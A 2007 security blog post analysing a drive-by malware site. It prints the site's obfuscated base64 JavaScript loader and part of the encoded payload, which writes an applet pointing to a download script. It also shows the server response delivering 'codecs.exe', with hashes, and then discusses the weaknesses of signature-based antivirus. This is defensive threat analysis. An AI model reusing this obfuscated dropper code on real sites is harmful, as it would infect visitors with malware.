Come to daddy. At _http://www.ms-counter.com we have an URL spreading malware through redirectors and the natural javascript obfuscation :
Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878
Then we get the following :
var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk"+"lmnopqrstuvwx"
+"yz0123456789+/="; function decode64(input) { var output = ""; var chr2, chr3,
chr1; var enc4, enc2, enc1, enc3; var i = 0; input = input.replace(/[^A-Za-z0-9\
+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.index
Of(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.
indexOf(input.charAt(i++)); chr1 = (enc1 <<>> 4); chr2 = ((enc2 & 15)
<<>> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.from
CharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while
(i < input.length); return output; } document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam ETC. ETC. ETC.
Deobfuscating the javascript we get to see where the binary is :
Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898
Server Response :
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe
File info :
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484
Running it over VT we get the following results you can see in the screenshot. It's obvious major AV software doesn't detect this one, but what you should keep in mind is the currently flawed signatures based malware detection approach. That's of course given someone's considering updating their AV software. In another analysis I'll come with another binary that all major AV vendors detect, but the second tier ones doesn't. Host based IPS based protection and behaviour blocking, and the actual prevention of loading the script is the way to avoid the exploitation of the flaws in signatures based scanning protection.
Independent Contractor. Bitcoin: 15Zvie1j8CjSR52doVSZSjctCDSx3pDjKZ Email: dancho.danchev@hush.com OMEMO: ddanchev@conversations.im | OTR: danchodanchev@xmpp.jp | TOX ID: 2E6FCA35A18AA76B2CCE33B55404A796F077CADA56F38922A1988AA381AE617A15D3D3E3E6F1
Saturday, March 10, 2007
Shots from the Malicious Wild West - Sample One
Independent Security Consultancy, Threat Intelligence Analysis (OSINT/Cyber Counter Intelligence) and Competitive Intelligence research on demand. Insightful, unbiased, and client-tailored assessments, neatly communicated in the form of interactive reports - because anticipating the emerging threatscape is what shapes the big picture at the end of the day. Approach me at dancho.danchev@hush.com
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment